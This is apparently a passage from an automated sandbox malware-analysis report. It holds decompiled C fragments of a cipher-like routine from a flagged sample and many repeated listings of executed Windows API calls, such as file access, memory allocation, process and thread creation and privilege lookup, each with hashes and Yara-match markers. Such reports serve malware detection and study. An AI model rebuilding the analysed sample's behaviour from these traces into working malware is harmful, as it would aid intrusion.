            					asm("ror edi, 0x8");
            					asm("rol esi, 0x8");
            					_t116[2] =  *(_t87 + 8) & 0xff00ff00 |  *(_t87 + 8) & 0x00ff00ff;
            					_t161 =  *(_t87 + 0xc);
            					_t64 =  &(_t116[1]);
            					asm("ror edi, 0x8");
            					_t140 = _t161 & 0xff00ff00;
            				}
            				asm("rol esi, 0x8");
            				_t116[3] = _t140 | _t161 & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t116[4] =  *(_t87 + 0x10) & 0xff00ff00 |  *(_t87 + 0x10) & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t116[5] =  *(_t87 + 0x14) & 0xff00ff00 |  *(_t87 + 0x14) & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t116[6] =  *(_t87 + 0x18) & 0xff00ff00 |  *(_t87 + 0x18) & 0x00ff00ff;
            				asm("ror esi, 0x8");
            				asm("rol ecx, 0x8");
            				_t116[7] =  *(_t87 + 0x1c) & 0xff00ff00 |  *(_t87 + 0x1c) & 0x00ff00ff;
            				if(_a20 != 0x100) {
            					L7:
            					return _t64 | 0xffffffff;
            				} else {
            					_t173 = _a8;
            					_t74 = 0;
            					_a16 = 0;
            					while(1) {
            						_t152 =  *(_t64 + 0x18);
            						_t100 = ( *(_t173 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t173 + _t74 + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t173 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t173 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t173 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t64 - 4);
            						_t133 =  *_t64 ^ _t100;
            						 *(_t64 + 0x1c) = _t100;
            						_t102 =  *(_t64 + 4) ^ _t133;
            						 *(_t64 + 0x20) = _t133;
            						_t135 =  *(_t64 + 8) ^ _t102;
            						 *(_t64 + 0x24) = _t102;
            						 *(_t64 + 0x28) = _t135;
            						if(_t74 == 6) {
            							break;
            						}
            						_t112 = ( *(_t173 + 4 + (_t135 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t173 + 4 + (_t135 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t173 + 4 + (_t135 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t173 + 5 + (_t135 & 0x000000ff) * 4) & 0x000000ff ^  *(_t64 + 0xc);
            						_t139 =  *(_t64 + 0x10) ^ _t112;
            						 *(_t64 + 0x2c) = _t112;
            						_t114 =  *(_t64 + 0x14) ^ _t139;
            						 *(_t64 + 0x34) = _t114;
            						_t74 = _a16 + 1;
            						 *(_t64 + 0x30) = _t139;
            						 *(_t64 + 0x38) = _t114 ^ _t152;
            						_t64 = _t64 + 0x20;
            						_a16 = _t74;
            						if(_t74 < 7) {
            							continue;
            						} else {
            							goto L7;
            						}
            						goto L9;
            					}
            					return 0xe;
            				}
            				L9:
            			}

















            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401030(signed char* __eax) {
            				signed char* _t37;
            				unsigned int _t65;
            				unsigned int _t73;
            				unsigned int _t81;
            				unsigned int _t88;
            				signed char _t94;
            				signed char _t97;
            				signed char _t100;
            
            				_t37 = __eax;
            				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
            				_t94 = __eax[0xb];
            				if((_t94 & 0x00000001) != 0) {
            					_t65 = _t65 | 0x80000000;
            				}
            				_t37[0xc] = _t65 >> 0x18;
            				_t37[0xf] = _t65;
            				_t37[0xd] = _t65 >> 0x10;
            				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
            				_t97 = _t37[7];
            				_t37[0xe] = _t65 >> 8;
            				if((_t97 & 0x00000001) != 0) {
            					_t73 = _t73 | 0x80000000;
            				}
            				_t37[8] = _t73 >> 0x18;
            				_t37[0xb] = _t73;
            				_t37[9] = _t73 >> 0x10;
            				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
            				_t100 = _t37[3];
            				_t37[0xa] = _t73 >> 8;
            				if((_t100 & 0x00000001) != 0) {
            					_t81 = _t81 | 0x80000000;
            				}
            				_t37[4] = _t81 >> 0x18;
            				_t37[7] = _t81;
            				_t37[5] = _t81 >> 0x10;
            				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
            				 *_t37 = _t88 >> 0x18;
            				_t37[1] = _t88 >> 0x10;
            				_t37[6] = _t81 >> 8;
            				_t37[2] = _t88 >> 8;
            				_t37[3] = _t88;
            				return _t37;
            			}












            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            Uniqueness

            Uniqueness Score: -1.00%

            Executed Functions

            APIs
            • NtCreateFile.NTDLL(00000060,00000000,.z`,02E54B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02E54B87,007A002E,00000000,00000060,00000000,00000000), ref: 02E59F7D
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID: .z`
            • API String ID: 823142352-1441809116
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtCreateFile.NTDLL(00000060,00000000,.z`,02E54B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02E54B87,007A002E,00000000,00000060,00000000,00000000), ref: 02E59F7D
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID: .z`
            • API String ID: 823142352-1441809116
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtCreateFile.NTDLL(00000060,00000000,.z`,02E54B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02E54B87,007A002E,00000000,00000060,00000000,00000000), ref: 02E59F7D
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID: .z`
            • API String ID: 823142352-1441809116
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtReadFile.NTDLL(02E54D42,5EB6522D,FFFFFFFF,02E54A01,?,?,02E54D42,?,02E54A01,FFFFFFFF,5EB6522D,02E54D42,?,00000000), ref: 02E5A025
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtReadFile.NTDLL(02E54D42,5EB6522D,FFFFFFFF,02E54A01,?,?,02E54D42,?,02E54A01,FFFFFFFF,5EB6522D,02E54D42,?,00000000), ref: 02E5A025
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02E42D11,00002000,00003000,00000004), ref: 02E5A149
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: AllocateMemoryVirtual
            • String ID:
            • API String ID: 2167126740-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtClose.NTDLL(02E54D20,?,?,02E54D20,00000000,FFFFFFFF), ref: 02E5A085
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtClose.NTDLL(02E54D20,?,?,02E54D20,00000000,FFFFFFFF), ref: 02E5A085
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: beef11311f44ae6210353898e851ee837edd004420acc4694843e16dc6fa457c
            • Instruction ID: cbb94c60728da9e0f72d93ae134a4aa56ae4d1509c510eca7d44796144822148
            • Opcode Fuzzy Hash: beef11311f44ae6210353898e851ee837edd004420acc4694843e16dc6fa457c
            • Instruction Fuzzy Hash: D59002B161108806F5106169840478A04059BD0345F55C412A4416658D87D9D8927161
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 99136bc22c59b2dfe03d5d2593cf4014f35c1ff1cb5e7aee40e152ceea18b508
            • Instruction ID: ff375a8166285a021fc9c332fcec961db2d53a184ec2b508e7683b9afadd3e86
            • Opcode Fuzzy Hash: 99136bc22c59b2dfe03d5d2593cf4014f35c1ff1cb5e7aee40e152ceea18b508
            • Instruction Fuzzy Hash: E19002B161100406F50065A9540868604059BE0345F51D012A5016555EC7A9D8927171
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: f801e2eb9f2f6a9dc298abc319ec63430db019f4cdad301e779db83d6eea31a1
            • Instruction ID: 2bf4d57b456b2d0c1a8d9e27c24963093e85074382c7e8b9d43f5f7344c491a4
            • Opcode Fuzzy Hash: f801e2eb9f2f6a9dc298abc319ec63430db019f4cdad301e779db83d6eea31a1
            • Instruction Fuzzy Hash: EC9002B172114406F5106169840474604059BD1245F51C412A0816558D87D9D8927162
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 3c18e9b23026887bd6581bdf53e5076660e7fb001c5c53d2ae3711616687b3c0
            • Instruction ID: 3b039e0590a6c210212479d54bb4f3d60e0b5d6ec0d595e32ef9395d1ee57853
            • Opcode Fuzzy Hash: 3c18e9b23026887bd6581bdf53e5076660e7fb001c5c53d2ae3711616687b3c0
            • Instruction Fuzzy Hash: ED9002A962300006F5807169540864A04059BD1246F91D416A0007558CCA59D86A6361
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • Sleep.KERNELBASE(000007D0), ref: 02E58CF8
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID: net.dll$wininet.dll
            • API String ID: 3472027048-1269752229
            • Opcode ID: 27be151a9e0d6c4fe89c7665854f30663a67aaeff252da0fbd6a8648570fa66b
            • Instruction ID: 15476c87196b0f5c9964e2b2a78f9726af0e8c8c547c58274696e3d50f2ad84b
            • Opcode Fuzzy Hash: 27be151a9e0d6c4fe89c7665854f30663a67aaeff252da0fbd6a8648570fa66b
            • Instruction Fuzzy Hash: EB3181B2540644BBC724DF64D884FA7B7F9AF48704F00851DFA2AAB241DB31A690CFA4
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • Sleep.KERNELBASE(000007D0), ref: 02E58CF8
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID: net.dll$wininet.dll
            • API String ID: 3472027048-1269752229
            • Opcode ID: 862c833e14c0bdfb4f1876fb14f5425961e18a73c113337c94da7648eaeaf9d3
            • Instruction ID: dc6cc287e9ffe87893cf7a3a45035f89052a13d0095f8fcb5a35e22c2351c71f
            • Opcode Fuzzy Hash: 862c833e14c0bdfb4f1876fb14f5425961e18a73c113337c94da7648eaeaf9d3
            • Instruction Fuzzy Hash: F121A2B1580744ABD720DF64C8C5BAAB7B5FF48704F00C01DEA296B241D771A690CFA4
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02E43AF8), ref: 02E5A26D
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: FreeHeap
            • String ID: .z`
            • API String ID: 3298025750-1441809116
            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
            • Instruction ID: ecccc3f60200118bf1cbd0d01152dcd1230c93d39f0601d338c75f60d407b7d4
            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
            • Instruction Fuzzy Hash: 1AE046B1210218ABDB18EF99CC48EA777ADEF88750F018659FE085B341C630F910CAF0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02E4834A
            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02E4836B
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: MessagePostThread
            • String ID:
            • API String ID: 1836367815-0
            • Opcode ID: 0cdbbfc7d916bb54955fb5c17b314cf0d6ae7cf26959e0bcb64d011d43216673
            • Instruction ID: 65ade1b32d040b6cff5a78b4204a46d6ae33a16edee1692c8d45d145553dc1a5
            • Opcode Fuzzy Hash: 0cdbbfc7d916bb54955fb5c17b314cf0d6ae7cf26959e0bcb64d011d43216673
            • Instruction Fuzzy Hash: 9901D831AD02287BE720AA94AC02FFE772D5B40B54F048015FF04BA1C1EA94660547E1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02E4834A
            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02E4836B
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: MessagePostThread
            • String ID:
            • API String ID: 1836367815-0
            • Opcode ID: da21c3352d2c5d1e9cbb8f90683f5c8b4db3c1cabdf29c5ef604bd67f1c16db5
            • Instruction ID: e56cdb38ec9ecfb2c40c7c8bf4805e80a2d7d1879a2293b8a7c3dbf34b15a03d
            • Opcode Fuzzy Hash: da21c3352d2c5d1e9cbb8f90683f5c8b4db3c1cabdf29c5ef604bd67f1c16db5
            • Instruction Fuzzy Hash: 8901A731AD03287BEB21A694AC02FFE776C6B40B55F148119FF04BA1C1EA946A0546F5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02E4AD42
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: Load
            • String ID:
            • API String ID: 2234796835-0
            • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
            • Instruction ID: 7e41ad94a3f7c3bfa1d019e345e9dab744e6a7ae4808432c20e82c3db713ad87
            • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
            • Instruction Fuzzy Hash: 78011EB5D8020DBBDB10EAA4EC51FDEB3799B44308F1091A5ED0997280FA31E754CB91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02E5A304
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: CreateInternalProcess
            • String ID:
            • API String ID: 2186235152-0
            • Opcode ID: 88a2d86f8b75480ac9d9c4c0dfab5e0854cdf932a7465a3d48ce94a3f2de4636
            • Instruction ID: 3c1cb2f2de2ac8cc4f1de3ef059ba29716dd617ed5082468e1df9c0dd49d3da2
            • Opcode Fuzzy Hash: 88a2d86f8b75480ac9d9c4c0dfab5e0854cdf932a7465a3d48ce94a3f2de4636
            • Instruction Fuzzy Hash: 4B01AFB2254108AFCB58DF99DC90EEB37AAAF8C754F158258FA0DD7240C630E851CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02E5A304
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: CreateInternalProcess
            • String ID:
            • API String ID: 2186235152-0
            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
            • Instruction ID: 69a75aacd785d0a17fddf3411b82b63bf1f15ac8ba6dc085cf72c107757022e3
            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
            • Instruction Fuzzy Hash: D701B2B2210108BFCB54DF89DC90EEB77AEAF8C754F158258FA0D97240C630E851CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02E4F020,?,?,00000000), ref: 02E58DBC
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: CreateThread
            • String ID:
            • API String ID: 2422867632-0
            • Opcode ID: 7dbd3d3ac7649bff7e69916e6ba891b68e71841462a5c44576f4ed8f9012fe9e
            • Instruction ID: 367e4b7e7dd6e55528bf8e0f0c0917b7a8d4a363a4e02aa860fe005f6092f22f
            • Opcode Fuzzy Hash: 7dbd3d3ac7649bff7e69916e6ba891b68e71841462a5c44576f4ed8f9012fe9e
            • Instruction Fuzzy Hash: 06E092333E03143AE330699DAC02FA7B39CCB91B25F544026FB0DEB2C0D995F44146A4
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlAllocateHeap.NTDLL(02E54506,?,02E54C7F,02E54C7F,?,02E54506,?,?,?,?,?,00000000,00000000,?), ref: 02E5A22D
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
            • Instruction ID: 0413ae3b2dc7f27cc7af88827f0b6e787bef7f2c89d56973f0a47158047cfe49
            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
            • Instruction Fuzzy Hash: 0BE012B1210218ABDB14EF99CC40EA777ADAF88650F118659BE085B241C630F9118AF0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02E4F1A2,02E4F1A2,?,00000000,?,?), ref: 02E5A3D0
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: LookupPrivilegeValue
            • String ID:
            • API String ID: 3899507212-0
            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
            • Instruction ID: 36ab10db9beb79d2346b7cfcf712a3fde9fe00a54175e6825c467f8548e8701f
            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
            • Instruction Fuzzy Hash: 7DE01AB12102186BDB10DF49CC84EE737ADAF88650F018165BE0857241C930E8118BF5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetErrorMode.KERNELBASE(00008003,?,02E48CF4,?), ref: 02E4F6CB
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: ErrorMode
            • String ID:
            • API String ID: 2340568224-0
            • Opcode ID: 52290f3c5ed973d7b54808ce33706a972a8e16d5d6ad1cf5c88ab95ee02c2060
            • Instruction ID: 043b42c3aa3e2d1b775187f13863467479cee405257dccb6e19fbf35c9f5db2e
            • Opcode Fuzzy Hash: 52290f3c5ed973d7b54808ce33706a972a8e16d5d6ad1cf5c88ab95ee02c2060
            • Instruction Fuzzy Hash: FDD05E767F03053AEA11EEE8AC07F26328AAB54A54F4944A4FA49DB2C3DA50D50185A1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetErrorMode.KERNELBASE(00008003,?,02E48CF4,?), ref: 02E4F6CB
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: ErrorMode
            • String ID:
            • API String ID: 2340568224-0
            • Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
            • Instruction ID: 297e4dbb523b929a9afa0a57a1a1a72fcbe90eae462aab7f20b9cb6557d1d1b0
            • Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
            • Instruction Fuzzy Hash: 1AD05E616A03043AE610AAA49C02F2632895B44A04F494064FA499A2C3DD50E0004565
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 7d2ff9bcdc0ff37d38b9381c50bca6e83e39baecdffcf9a45f30257e96589682
